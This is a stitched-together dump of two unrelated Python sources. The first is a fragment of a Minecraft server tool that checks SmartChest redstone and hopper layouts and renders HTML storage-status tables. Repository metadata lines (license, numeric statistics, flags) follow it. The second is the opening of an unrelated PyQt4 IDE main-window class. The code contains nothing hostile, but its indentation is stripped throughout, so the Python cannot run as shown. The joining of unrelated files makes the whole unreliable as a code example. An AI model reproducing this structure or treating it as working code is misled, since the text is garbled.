return 'Quartz slab at {} {} {} should be a top slab, is a bottom slab.'.format(exact_x, exact_y, exact_z)
elif block_symbol == 'R':
# repeater
if block['id'] not in ('minecraft:unpowered_repeater', 'minecraft:powered_repeater'):
return 'Block at {} {} {} should be a repeater, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
known_facings = {
(1, -8, 2): 0x0, # north
(3, -8, 3): 0x3 if z % 2 == 0 else 0x1, # west / east
(6, -6, 2): 0x0, # north
(7, -5, 5): 0x2, # south
(3, -3, 1): 0x1 if z % 2 == 0 else 0x3 # east / west
}
facing = block['damage'] & 0x3
if (layer_x, layer_y, layer_z) in known_facings:
if known_facings[layer_x, layer_y, layer_z] != facing:
return 'Repeater at {} {} {} is facing the wrong way.'.format(exact_x, exact_y, exact_z)
else:
return 'Direction check for repeater at {} {} {} (relative coords: {} {} {}) not yet implemented.'.format(exact_x, exact_y, exact_z, layer_x, layer_y, layer_z)
known_delays = { # in game ticks
(1, -8, 2): 4,
(3, -8, 3): 2,
(6, -6, 2): 2,
(7, -5, 5): 2,
(3, -3, 1): 2
}
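# the repeater's delay setting lives in damage bits 2-3 (values 0-3); each step adds 2 game ticks on top of the minimum delay of 2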
delay_ticks = 2 * (block['damage'] >> 2) + 2
if (layer_x, layer_y, layer_z) in known_delays:
if known_delays[layer_x, layer_y, layer_z] != delay_ticks:
return 'Repeater at {} {} {} has a delay of {} game tick{}, should be {}.'.format(exact_x, exact_y, exact_z, delay_ticks, '' if delay_ticks == 1 else 's', known_delays[layer_x, layer_y, layer_z])
else:
return 'Delay check for repeater at {} {} {} (relative coords: {} {} {}) not yet implemented.'.format(exact_x, exact_y, exact_z, layer_x, layer_y, layer_z)
elif block_symbol == 'S':
# stone top slab
if block['id'] != 'minecraft:stone_slab':
return 'Block at {} {} {} should be a stone slab, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 0x0:
slab_variant = {
0: 'stone',
1: 'sandstone',
2: 'fake wood',
3: 'cobblestone',
4: 'brick',
5: 'stone brick',
6: 'Nether brick',
7: 'quartz'
}[block['damage'] & 0x7]
return 'Block at {} {} {} should be a <a href="/block/minecraft/stone_slab/0">stone slab</a>, is a <a href="/block/minecraft/stone_slab/{}">{} slab</a>.'.format(exact_x, exact_y, exact_z, block['damage'] & 0x7, slab_variant)
if block['damage'] & 0x8 != 0x8:
return 'Stone slab at {} {} {} should be a top slab, is a bottom slab.'.format(exact_x, exact_y, exact_z)
elif block_symbol == 'T':
# redstone torch attached to the side of a block
if block['id'] not in ('minecraft:unlit_redstone_torch', 'minecraft:redstone_torch'):
return 'Block at {} {} {} should be a redstone torch, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
known_facings = {
(3, -8, 1): 1 if z % 2 == 0 else 2, # west / east
(2, -7, 1): 3, # north
(4, -6, 1): 2 if z % 2 == 0 else 1, # east / west
(4, -6, 2): 3, # north
(4, -5, 1): 1 if z % 2 == 0 else 2, # west / east
(4, -5, 3): 4, # south
(7, -5, 3): 3, # north
(1, -4, 2): 4, # south
(1, -3, 3): 3, # north
(1, -1, 4): 4, # south
(5, -1, 1): 2 if z % 2 == 0 else 1, # east / west
(3, 0, 3): 4 # south
}
if (layer_x, layer_y, layer_z) in known_facings:
if known_facings[layer_x, layer_y, layer_z] != block['damage']:
return 'Redstone torch at {} {} {} is attached to the block {}, should be attached to the block {}.'.format(exact_x, exact_y, exact_z, TORCH_FACINGS[block['damage']], TORCH_FACINGS[known_facings[layer_x, layer_y, layer_z]])
else:
return 'Facing check for redstone torch at {} {} {} (relative coords: {} {} {}) not yet implemented.'.format(exact_x, exact_y, exact_z, layer_x, layer_y, layer_z)
elif block_symbol == 'W':
# back wall
if z == corridor_length - 1 or z == corridor_length - 2 and z % 2 == 0:
if block['id'] != 'minecraft:stone':
return 'Block at {} {} {} should be stone, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 0:
stone_variant = {
0: 'stone',
1: 'granite',
2: 'polished granite',
3: 'diorite',
4: 'polished diorite',
5: 'andesite',
6: 'polished andesite'
}[block['damage']]
return 'Block at {} {} {} should be <a href="/block/minecraft/stone/0">regular stone</a>, is <a href="/block/minecraft/stone/{}">{}</a>.'.format(exact_x, exact_y, exact_z, block['damage'], stone_variant)
elif block_symbol == 'X':
# overflow hopper chain pointing down
if layer_y < -7 and y < 6 and (z == 4 or z == 5) or layer_y > -7 and y > 1 and (z == 0 or z == 1):
if block['id'] == 'minecraft:hopper':
if block['damage'] != 0: # down
return 'Overflow hopper at {} {} {} should be pointing down, is {}.'.format(exact_x, exact_y, exact_z, HOPPER_FACINGS[block['damage']])
elif block['id'] == 'minecraft:air':
pass # also allow air because some overflow hopper chains don't start on the first floor
else:
return 'Block at {} {} {} should be air or a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
else:
if block['id'] != 'minecraft:air':
return 'Block at {} {} {} should be air, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == '^':
# hopper facing outward
if block['id'] != 'minecraft:hopper':
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != (5 if z % 2 == 0 else 4): # east / west
return 'Hopper at {} {} {} should be pointing {}, is {}.'.format(exact_x, exact_y, exact_z, 'east' if z % 2 == 0 else 'west', HOPPER_FACINGS[block['damage']])
storage_hoppers = {
(3, -5, 3),
(6, -5, 3),
(7, -4, 3),
(5, -3, 2),
(6, -3, 2)
}
if (layer_x, layer_y, layer_z) in storage_hoppers:
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Storage hopper at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == 'c':
# crafting table
if layer_y == -7 and (y == 6 or z < 4 or z < 6 and layer_z > 1):
if block['id'] != 'minecraft:stone':
return 'Block at {} {} {} should be stone, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 0:
stone_variant = STONE_VARIANTS[block['damage']]
return 'Block at {} {} {} should be <a href="/block/minecraft/stone/0">regular stone</a>, is <a href="/block/minecraft/stone/{}">{}</a>.'.format(exact_x, exact_y, exact_z, block['damage'], stone_variant)
else:
if block['id'] != 'minecraft:crafting_table':
return 'Block at {} {} {} should be a crafting table, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == 'i':
# torch attached to the top of a block
if block['id'] != 'minecraft:torch':
return 'Block at {} {} {} should be a torch, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 5: # attached to the block below
return 'Torch at {} {} {} should be attached to the block below, is attached to the block {}.'.format(exact_x, exact_y, exact_z, TORCH_FACINGS[block['damage']])
elif block_symbol == 'p':
# oak planks
if layer_y == -8 and (y == 6 or z < 4 or z < 6 and layer_z > 1):
if block['id'] != 'minecraft:stone':
return 'Block at {} {} {} should be stone, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 0:
stone_variant = STONE_VARIANTS[block['damage']]
return 'Block at {} {} {} should be <a href="/block/minecraft/stone/0">regular stone</a>, is <a href="/block/minecraft/stone/{}">{}</a>.'.format(exact_x, exact_y, exact_z, block['damage'], stone_variant)
else:
if block['id'] != 'minecraft:planks':
return 'Block at {} {} {} should be oak planks, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
pass #TODO check material
elif block_symbol == 'r':
# redstone dust
if block['id'] != 'minecraft:redstone_wire':
return 'Block at {} {} {} should be redstone, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == 's':
# stone
if block['id'] != 'minecraft:stone':
if exact_y < 5:
if block['id'] != 'minecraft:bedrock':
return 'Block at {} {} {} should be stone or bedrock, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
else:
return 'Block at {} {} {} should be stone, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 0:
stone_variant = STONE_VARIANTS[block['damage']]
return 'Block at {} {} {} should be <a href="/block/minecraft/stone/0">regular stone</a>, is <a href="/block/minecraft/stone/{}">{}</a>.'.format(exact_x, exact_y, exact_z, block['damage'], stone_variant)
elif block_symbol == 't':
# redstone torch attached to the top of a block
if block['id'] not in ('minecraft:unlit_redstone_torch', 'minecraft:redstone_torch'):
return 'Block at {} {} {} should be a redstone torch, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 5: # attached to the block below
return 'Redstone torch at {} {} {} should be attached to the block below, is attached to the block {}.'.format(exact_x, exact_y, exact_z, TORCH_FACINGS[block['damage']])
elif block_symbol == 'v':
# hopper facing inwards
if block['id'] != 'minecraft:hopper':
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != (4 if z % 2 == 0 else 5): # west / east
return 'Hopper at {} {} {} should be pointing {}, is {}.'.format(exact_x, exact_y, exact_z, 'west' if z % 2 == 0 else 'east', HOPPER_FACINGS[block['damage']])
storage_hoppers = {
(3, -7, 4),
(4, -7, 4),
(2, -6, 3)
}
if (layer_x, layer_y, layer_z) in storage_hoppers:
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Storage hopper at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == 'x':
# hopper facing down
if block['id'] != 'minecraft:hopper':
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 0: # down
return 'Hopper at {} {} {} should be pointing down, is {}.'.format(exact_x, exact_y, exact_z, HOPPER_FACINGS[block['damage']])
storage_hoppers = {
(5, -1, 2)
}
if (layer_x, layer_y, layer_z) in storage_hoppers:
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Storage hopper at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == '~':
# hopper chain
if block['id'] == 'minecraft:hopper':
pass #TODO check facing
pass #TODO check alignment
elif block['id'] == 'minecraft:air':
pass #TODO check alignment
else:
return 'Block at {} {} {} should be a hopper or air, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
pass #TODO check hopper chain integrity
else:
return 'Not yet implemented: block at {} {} {} should be {}.'.format(exact_x, exact_y, exact_z, block_symbol)
# error check: items in storage chests but not in access chest
access_chest_fill_level = alltheitems.item.comparator_signal(north_half, south_half)
bottom_dropper_fill_level = alltheitems.item.comparator_signal(block_at(*layer_coords(5, -7, 3), chunk_cache=chunk_cache))
if access_chest_fill_level < 2 and bottom_dropper_fill_level > 2:
return 'Access chest is {}empty but there are items stuck in the storage dropper at {} {} {}.'.format('' if access_chest_fill_level == 0 else 'almost ', *layer_coords(5, -7, 3))
if durability and has_smart_chest:
# error check: damaged or enchanted tools in storage chests
storage_containers = set(CONTAINERS) - {(5, 0, 2), (5, 0, 3)}
for container in storage_containers:
for slot in block_at(*layer_coords(*container), chunk_cache=chunk_cache)['tileEntity']['Items']:
if slot.get('Damage', 0) > 0:
return 'Item in storage container at {} {} {} is damaged.'.format(*layer_coords(*container))
if len(slot.get('tag', {}).get('ench', [])) > 0:
return 'Item in storage container at {} {} {} is enchanted.'.format(*layer_coords(*container))
def chest_state(coords, item_stub, corridor_length, item_name=None, pre_sorter=None, *, items_data=None, block_at=alltheitems.world.World().block_at, document_root=ati.document_root, chunk_cache=None, cache=None, allow_cache=True):
if items_data is None:
with (ati.assets_root / 'json' / 'items.json').open() as items_file:
items_data = json.load(items_file)
if chunk_cache is None:
chunk_cache = {}
if isinstance(item_stub, str):
item_stub = {'id': item_stub}
item = alltheitems.item.Item(item_stub, items_data=items_data)
if item_name is None:
item_name = item.info()['name']
state = None, 'This SmartChest is in perfect state.', None
x, y, z = coords
# determine the base coordinate, i.e. the position of the north half of the access chest
if z % 2 == 0:
# left wall
base_x = 15 * x + 2
else:
# right wall
base_x = 15 * x - 3
base_y = 73 - 10 * y
base_z = 28 + 10 * y + 4 * (z // 2)
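# layer_coords translates schematic-relative offsets into absolute world coordinates; the x offset is mirrored depending on whether the chest sits on the left or right wall of the corridor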
def layer_coords(layer_x, layer_y, layer_z):
if z % 2 == 0:
# left wall
exact_x = base_x + 5 - layer_x
else:
# right wall
exact_x = base_x - 5 + layer_x
exact_y = base_y + layer_y
exact_z = base_z + 3 - layer_z
return exact_x, exact_y, exact_z
# does the access chest exist?
exists = False
north_half = block_at(base_x, base_y, base_z, chunk_cache=chunk_cache)
south_half = block_at(base_x, base_y, base_z + 1, chunk_cache=chunk_cache)
if north_half['id'] != 'minecraft:chest' and south_half['id'] != 'minecraft:chest':
state = 'gray', 'Access chest does not exist.', None
elif north_half['id'] != 'minecraft:chest':
state = 'gray', 'North half of access chest does not exist.', None
elif south_half['id'] != 'minecraft:chest':
state = 'gray', 'South half of access chest does not exist.', None
else:
exists = True
# does it have a SmartChest?
has_smart_chest = False
missing_droppers = set()
for dropper_y in range(base_y - 7, base_y):
dropper = block_at(base_x, dropper_y, base_z, chunk_cache=chunk_cache)
if dropper['id'] != 'minecraft:dropper':
missing_droppers.add(dropper_y)
if len(missing_droppers) == 7:
if state[0] is None:
state = 'orange', 'SmartChest droppers do not exist.', None
elif len(missing_droppers) > 1:
if state[0] is None:
state = 'orange', 'SmartChest droppers at y={} do not exist.'.format(', y='.join(str(dropper) for dropper in missing_droppers)), None
elif len(missing_droppers) == 1:
if state[0] is None:
state = 'orange', 'SmartChest dropper at y={} does not exist, is {}.'.format(next(iter(missing_droppers)), block_at(base_x, next(iter(missing_droppers)), base_z, chunk_cache=chunk_cache)['id']), None
else:
has_smart_chest = True
# is it stackable?
stackable = item.info().get('stackable', True)
if not stackable and state[0] is None:
state = 'cyan', "This SmartChest is in perfect state (but the item is not stackable, so it can't be sorted).", None
# does it have a durability bar?
durability = 'durability' in item.info()
# does it have a sorter?
has_sorter = False
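# the sorting hopper's remaining slots are padded with a filler item; crafting tables are used when the sorted item itself stacks to less than 64, Ender pearls otherwise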
if item == 'minecraft:crafting_table' or stackable and item.max_stack_size < 64:
filler_item = alltheitems.item.Item('minecraft:crafting_table', items_data=items_data)
else:
filler_item = alltheitems.item.Item('minecraft:ender_pearl', items_data=items_data)
sorting_hopper = block_at(base_x - 2 if z % 2 == 0 else base_x + 2, base_y - 3, base_z, chunk_cache=chunk_cache)
if sorting_hopper['id'] != 'minecraft:hopper':
if state[0] is None:
state = 'yellow', 'Sorting hopper does not exist, is {}.'.format(sorting_hopper['id']), None
else:
for slot in sorting_hopper['tileEntity']['Items']:
if slot['Slot'] == 0 and stackable and not item.matches_slot(slot) and filler_item.matches_slot(slot):
if state[0] is None or state[0] == 'cyan':
state = 'yellow', 'Sorting hopper is full of {}, but the sorted item is stackable, so the first slot should contain the item.'.format(filler_item.link_text()), None
break
else:
has_sorter = True
# does it have an overflow?
has_overflow = False
missing_overflow_hoppers = set()
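# check the three hopper positions leading away from the chest at the overflow level (y = base_y - 7) toward the corridor's overflow hopper chain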
for overflow_x in range(base_x + 3 if z % 2 == 0 else base_x - 3, base_x + 6 if z % 2 == 0 else base_x - 6, 1 if z % 2 == 0 else -1):
overflow_hopper = block_at(overflow_x, base_y - 7, base_z - 1, chunk_cache=chunk_cache)
if overflow_hopper['id'] != 'minecraft:hopper':
missing_overflow_hoppers.add(overflow_x)
if len(missing_overflow_hoppers) == 0:
has_overflow = True
# state determined, check for errors
if coords == (1, 1, 0): # Ender pearls
message = global_error_checks(chunk_cache=chunk_cache, block_at=block_at)
if message is not None:
return 'red', message, None
cache_path = ati.cache_root / 'cloud-chests.json'
if cache is None:
if cache_path.exists():
with cache_path.open() as cache_f:
cache = json.load(cache_f)
else:
cache = {}
max_age = datetime.timedelta(hours=1, minutes=random.randrange(0, 60)) # use a random value between 1 and 2 hours for the cache expiration
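# reuse the cached result only if an entry exists for this chest (keyed by y, x, z as strings), it reported no error, and it is younger than max_age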
if allow_cache and str(y) in cache and str(x) in cache[str(y)] and str(z) in cache[str(y)][str(x)] and cache[str(y)][str(x)][str(z)]['errorMessage'] is None and datetime.datetime.strptime(cache[str(y)][str(x)][str(z)]['timestamp'], '%Y-%m-%d %H:%M:%S') > datetime.datetime.utcnow() - max_age:
message = cache[str(y)][str(x)][str(z)]['errorMessage']
pass # cached check results are recent enough
else:
# cached check results are too old, recheck
message = chest_error_checks(x, y, z, base_x, base_y, base_z, item, item_name, exists, stackable, durability, has_smart_chest, has_sorter, has_overflow, filler_item, sorting_hopper, missing_overflow_hoppers, north_half, south_half, corridor_length, pre_sorter, layer_coords, block_at, items_data, chunk_cache, document_root)
if ati.cache_root.exists():
if str(y) not in cache:
cache[str(y)] = {}
if str(x) not in cache[str(y)]:
cache[str(y)][str(x)] = {}
cache[str(y)][str(x)][str(z)] = {
'errorMessage': message,
'timestamp': datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
}
with cache_path.open('w') as cache_f:
json.dump(cache, cache_f, sort_keys=True, indent=4)
if message is not None:
return 'red', message, None
# no errors, determine fill level
if state[0] in (None, 'cyan', 'orange', 'yellow'):
try:
containers = CONTAINERS if state[0] in (None, 'cyan') else [ # layer coords of the access chest
(5, 0, 2),
(5, 0, 3)
]
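# count items across all containers, skipping damaged tools (for items with durability) and the 4 stacks that permanently occupy the bottom dropper at (5, -7, 3)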
total_items = sum(max(0, sum(slot['Count'] for slot in block_at(*layer_coords(*container), chunk_cache=chunk_cache)['tileEntity']['Items'] if slot.get('Damage', 0) == 0 or not durability) - (4 * item.max_stack_size if container == (5, -7, 3) else 0)) for container in containers) # Don't count the 4 stacks of items that are stuck in the bottom dropper. Don't count damaged tools.
max_slots = sum(alltheitems.item.NUM_SLOTS[block_at(*layer_coords(*container), chunk_cache=chunk_cache)['id']] for container in containers) - (0 if state[0] == 'orange' else 4)
return state[0], state[1], FillLevel(item.max_stack_size, total_items, max_slots, is_smart_chest=state[0] in (None, 'cyan'))
except:
# something went wrong determining fill level, re-check errors
message = chest_error_checks(x, y, z, base_x, base_y, base_z, item, item_name, exists, stackable, durability, has_smart_chest, has_sorter, has_overflow, filler_item, sorting_hopper, missing_overflow_hoppers, north_half, south_half, corridor_length, pre_sorter, layer_coords, block_at, items_data, chunk_cache, document_root)
if ati.cache_root.exists():
if str(y) not in cache:
cache[str(y)] = {}
if str(x) not in cache[str(y)]:
cache[str(y)][str(x)] = {}
cache[str(y)][str(x)][str(z)] = {
'errorMessage': message,
'timestamp': datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
}
with cache_path.open('w') as cache_f:
json.dump(cache, cache_f, sort_keys=True, indent=4)
if message is None:
raise
else:
return 'red', message, None
return state
def cell_from_chest(coords, item_stub, corridor_length, item_name=None, pre_sorter=None, *, chunk_cache=None, items_data=None, colors_to_explain=None, cache=None, allow_cache=True):
color, state_message, fill_level = chest_state(coords, item_stub, corridor_length, item_name, pre_sorter, items_data=items_data, chunk_cache=chunk_cache, cache=cache, allow_cache=allow_cache)
if colors_to_explain is not None:
colors_to_explain.add(color)
if fill_level is None or fill_level.is_full():
return '<td style="background-color: {};">{}</td>'.format(HTML_COLORS[color], alltheitems.item.Item(item_stub, items_data=items_data).image())
else:
return '<td style="background-color: {};">{}<div class="durability"><div style="background-color: #f0f; width: {}px;"></div></div></td>'.format(HTML_COLORS[color], alltheitems.item.Item(item_stub, items_data=items_data).image(), 0 if fill_level.is_empty() else 2 + int(fill_level.fraction * 13) * 2)
def index(allow_cache=True):
yield ati.header(title='Cloud')
def body():
yield '<p>The <a href="//wiki.{host}/Cloud">Cloud</a> is the public item storage on <a href="//{host}/">Wurstmineberg</a>, consisting of 6 underground floors with <a href="//wiki.{host}/SmartChest">SmartChests</a> in them.</p>'.format(host=ati.host)
yield """<style type="text/css">
.item-table td {
box-sizing: content-box;
height: 32px;
width: 32px;
position: relative;
}
.item-table .left-sep {
border-left: 1px solid gray;
}
.durability {
z-index: 1;
}
</style>"""
chunk_cache = {}
with (ati.assets_root / 'json' / 'items.json').open() as items_file:
items_data = json.load(items_file)
cache_path = ati.cache_root / 'cloud-chests.json'
if cache_path.exists():
try:
with cache_path.open() as cache_f:
cache = json.load(cache_f)
except ValueError:
# cache JSON is corrupted, probably because of a full disk, try without cache
cache_path.unlink()
cache = None
else:
cache = None
colors_to_explain = set()
floors = {}
for x, corridor, y, floor, z, chest in chest_iter():
if y not in floors:
floors[y] = floor
for y, floor in sorted(floors.items(), key=lambda tup: tup[0]):
def cell(coords, item_stub, corridor):
if isinstance(item_stub, str):
item_stub = {'id': item_stub}
item_name = None
pre_sorter = None
else:
item_stub = item_stub.copy()
if 'name' in item_stub:
item_name = item_stub['name']
del item_stub['name']
else:
item_name = None
if 'sorter' in item_stub:
pre_sorter = item_stub['sorter']
del item_stub['sorter']
else:
pre_sorter = None
return cell_from_chest(coords, item_stub, len(corridor), item_name, pre_sorter, chunk_cache=chunk_cache, colors_to_explain=colors_to_explain, items_data=items_data, cache=cache, allow_cache=allow_cache)
yield bottle.template("""
%import itertools
<h2 id="floor{{y}}">{{y}}{{ordinal(y)}} floor (y={{73 - 10 * y}})</h2>
<table class="item-table" style="margin-left: auto; margin-right: auto;">
%for x in range(-3, 4):
%if x > -3:
<colgroup class="left-sep">
<col />
<col />
</colgroup>
%else:
<colgroup>
<col />
<col />
</colgroup>
%end
%end
<tbody>
%for z_left, z_right in zip(itertools.count(step=2), itertools.count(start=1, step=2)):
%found = False
<tr>
%for x in range(-3, 4):
%if str(x) not in floor:
<td></td>
<td></td>
%continue
%end
%corridor = floor[str(x)]
%if len(corridor) > z_right:
{{!cell((x, y, z_right), corridor[z_right], corridor)}}
%else:
<td></td>
%end
%if len(corridor) > z_left:
{{!cell((x, y, z_left), corridor[z_left], corridor)}}
%found = True
%else:
<td></td>
%end
%end
</tr>
%if not found:
%break
%end
%end
</tbody>
</table>
""", ordinal=alltheitems.util.ordinal, cell=cell, floor=floor, y=y)
color_explanations = collections.OrderedDict([
('red', '<p>A red background means that there is something wrong with the chest. See the item info page for details.</p>'),
('gray', "<p>A gray background means that the chest hasn't been built yet or is still located somewhere else.</p>"),
('orange', "<p>An orange background means that the chest doesn't have a SmartChest yet. It can only store 54 stacks.</p>"),
('yellow', "<p>A yellow background means that the chest doesn't have a sorter yet.</p>"),
('cyan', '<p>A cyan background means that the chest has no sorter because it stores an unstackable item. These items should not be automatically <a href="//wiki.wurstmineberg.de/Soup#Cloud">sent</a> to the Cloud.</p>'),
(None, '<p>A white background means that everything is okay: the chest has a SmartChest, a sorter, and overflow protection.</p>')
])
for chest_color in sorted(colors_to_explain, key=list(color_explanations.keys()).index):
if chest_color is not None or len(colors_to_explain) > 1:
yield color_explanations[chest_color]
yield from ati.html_exceptions(body())
yield ati.footer(linkify_headers=True)
def todo():
yield ati.header(title='Cloud by priority')
def body():
yield """<style type="text/css">
.todo-table td {
text-align: left;
vertical-align: middle !important;
}
.todo-table .coord {
width: 3em;
text-align: right;
}
.todo-table .item-image {
box-sizing: content-box;
width: 32px;
}
.todo-table .item-name {
width: 24em;
}
</style>"""
headers = collections.OrderedDict([
('red', 'Build errors'),
('gray', 'Missing chests'),
('orange', 'Missing SmartChests'),
('yellow', 'Missing sorters'),
('cyan', 'Empty SmartChests (unstackable)'),
('white', 'Empty SmartChests (stackable)'),
('cyan2', 'Missing items (unstackable)'),
('white2', 'Missing items (stackable)')
])
header_indexes = {color: i for i, color in enumerate(headers.keys())}
def priority(pair):
coords, state = pair
x, y, z = coords
color, _, fill_level, _ = state
return header_indexes[color], None if fill_level is None else fill_level.fraction * (-1 if color == 'orange' else 1), y * (-1 if color == 'orange' else 1), x if y % 2 == 0 else -x, z
chunk_cache = {}
with (ati.assets_root / 'json' / 'items.json').open() as items_file:
items_data = json.load(items_file)
cache_path = ati.cache_root / 'cloud-chests.json'
if cache_path.exists():
try:
with cache_path.open() as cache_f:
cache = json.load(cache_f)
except ValueError:
# cache JSON is corrupted, probably because of a full disk, try without cache
cache_path.unlink()
cache = None
else:
cache = None
states = {}
current_color = None
for x, corridor, y, _, z, item_stub in chest_iter():
if isinstance(item_stub, str):
item_stub = {'id': item_stub}
item_name = None
pre_sorter = None
else:
item_stub = item_stub.copy()
if 'name' in item_stub:
item_name = item_stub['name']
del item_stub['name']
else:
item_name = None
if 'sorter' in item_stub:
pre_sorter = item_stub['sorter']
del item_stub['sorter']
else:
pre_sorter = None
color, state_message, fill_level = chest_state((x, y, z), item_stub, len(corridor), item_name, pre_sorter, items_data=items_data, chunk_cache=chunk_cache, cache=cache)
if color is None:
color = 'white'
if color in ('cyan', 'white') and not fill_level.is_empty():
color += '2'
if fill_level is None or not fill_level.is_full() or color not in ('cyan', 'white', 'cyan2', 'white2'):
states[x, y, z] = color, state_message, fill_level, alltheitems.item.Item(item_stub, items_data=items_data)
for coords, state in sorted(states.items(), key=priority):
x, y, z = coords
color, state_message, fill_level, item = state
if color != current_color:
if current_color is not None:
yield '</tbody></table>'
yield bottle.template('<h2 id="{{color}}">{{header}}</h2>', color=color, header=headers[color])
yield '<table class="todo-table table table-responsive"><thead><tr><th class="coord">X</th><th class="coord">Y</th><th class="coord">Z</th><th class="item-image"> </th><th class="item-name">Item</th><th>{}</th></tr></thead><tbody>'.format('Fill Level' if color in ('cyan', 'white', 'cyan2', 'white2') else 'Info')
current_color = color
yield bottle.template("""
<tr>
<td class="coord">{{x}}</td>
<td class="coord">{{y}}</td>
<td class="coord">{{z}}</td>
<td class="item-image">{{!item.image()}}</td>
<td class="item-name">{{!item.link_text()}}</td>
<td style="background-color: {{color}}">{{!fill_level if color in ('#0ff', '#fff') else state_message}}</td>
</tr>
""", x=x, y=y, z=z, item=item, color=HTML_COLORS[color], fill_level=fill_level, state_message=state_message)
yield '</tbody></table>'
yield from ati.html_exceptions(body())
yield ati.footer(linkify_headers=True)
|
mit
| 6,210,669,962,743,115,000
| 59.09228
| 392
| 0.481912
| false
| 3.874814
| false
| false
| false
|
amirgeva/coide
|
mainwindow.py
|
1
|
54237
|
from PyQt4 import QtCore
from PyQt4 import QtGui
import os
import re
import stat
import qutepart
from workspace import WorkSpace
import output
from consts import FileRole
from gdbwrapper import GDBWrapper
from watchestree import WatchesTree
from breakpoints import BreakpointsDB, BreakpointDialog
from properties import Properties
from functools import partial
from globals import is_src_ext
import utils
import genmake
import uis
import plugins
import dwarf
class MainWindow(QtGui.QMainWindow):
""" Main IDE Window
Contains the main code view, along with docking panes for: source files,
watches, call stack, and output
"""
LIBRARY_SCAN = "Scanning Libraries"
def __init__(self,rootDir,parent=None):
""" Initialize. rootDir indicates where data files are located """
super(MainWindow,self).__init__(parent)
s=QtCore.QSettings()
self.recent_ws=[d for d in s.value('recent_ws','').toString().split(':') if d]
self.symbolScan=s.value('symbol_scan',True).toBool()
self.setMinimumSize(QtCore.QSize(1024,768))
self.currentLine=0
self.currentFile=''
self.rootDir=rootDir
utils.setIconsDir(os.path.join(rootDir,"icons"))
self.debugger=None
self.breakpoints=BreakpointsDB()
self.findDetails=None
self.scm_mods=[]
self.setWindowIcon(utils.loadIcon('coide'))
self.setWindowTitle("Coide")
self.generateQueue=set()
self.editors={}
self.file_times={}
self.central=QtGui.QTabWidget()
self.setCentralWidget(self.central)
self.central.setTabsClosable(True)
self.central.tabCloseRequested.connect(self.closeTab)
self.central.currentChanged.connect(self.tabChanged)
self.tabOrder=[]
self.plugins=plugins.PluginsManager()
self.setupMenu()
self.setupContextMenuItems()
self.setupToolbar(rootDir)
self.showWorkspacePane()
self.showOutputPane()
self.showWatchesPane()
self.showLocalsPane()
self.showCallStackPane()
self.buildProcess=None
self.timerCall=None
self.config=s.value("config").toString()
if self.config=='':
self.config="Debug"
self.configCombo.setCurrentIndex(0 if self.config=='Debug' else 1)
self.workspaceTree.setConfig(self.config)
self.setAllFonts()
self.loadWindowSettings()
# Debugger timer that is supposed to periodically check
# if the program has stopped at a breakpoint
self.timer=QtCore.QTimer(self)
self.timer.timeout.connect(self.update)
self.runningWidget=None
self.asyncPollTimer=QtCore.QTimer(self)
self.asyncPollTimer.timeout.connect(self.pollAsync)
self.generateTimer=QtCore.QTimer()
self.generateTimer.timeout.connect(self.timer1000)
self.generateTimer.start(1000)
self.lowFreqTimer=QtCore.QTimer()
self.lowFreqTimer.timeout.connect(self.timer5000)
self.lowFreqTimer.start(5000)
#self.showStatus("Generating All Makefiles")
#self.timerCall=self.generateAllInThread
self.timerCall=None
self.paneWatches.hide()
self.paneLocals.hide()
self.paneStack.hide()
#self.sc=QtGui.QShortcut("Ctrl+F8",self)
#self.sc.activated.connect(self.prtsc)
def closeEvent(self, event):
""" Called before the application window closes
Informs sub-windows to prepare and saves window settings
to allow future sessions to look the same
"""
self.workspaceTree.onClose()
self.workspaceTree.saveTabs(self.central)
while self.central.count()>0:
if not self.closeFile():
event.ignore()
return
self.timer.stop()
self.generateTimer.stop()
if self.debugger:
self.debugger.closingApp()
settings = QtCore.QSettings()
settings.setValue("geometry", self.saveGeometry())
settings.setValue("windowState", self.saveState())
settings.sync()
self.removeTempScripts()
super(MainWindow,self).closeEvent(event)
def saveDebugWindowState(self):
"""
Save the state of the tool docks, like watches
and call stack
"""
settings = QtCore.QSettings()
settings.setValue("debugWindowState", self.saveState())
settings.sync()
def loadDebugWindowState(self):
"""
Restore previous debug windows layout
"""
settings = QtCore.QSettings()
self.restoreState(settings.value("debugWindowState").toByteArray())
def loadWindowSettings(self):
"""
Restore the window size settings from the previous session
"""
settings = QtCore.QSettings()
self.restoreGeometry(settings.value("geometry").toByteArray())
self.restoreState(settings.value("windowState").toByteArray())
self.loadTabs()
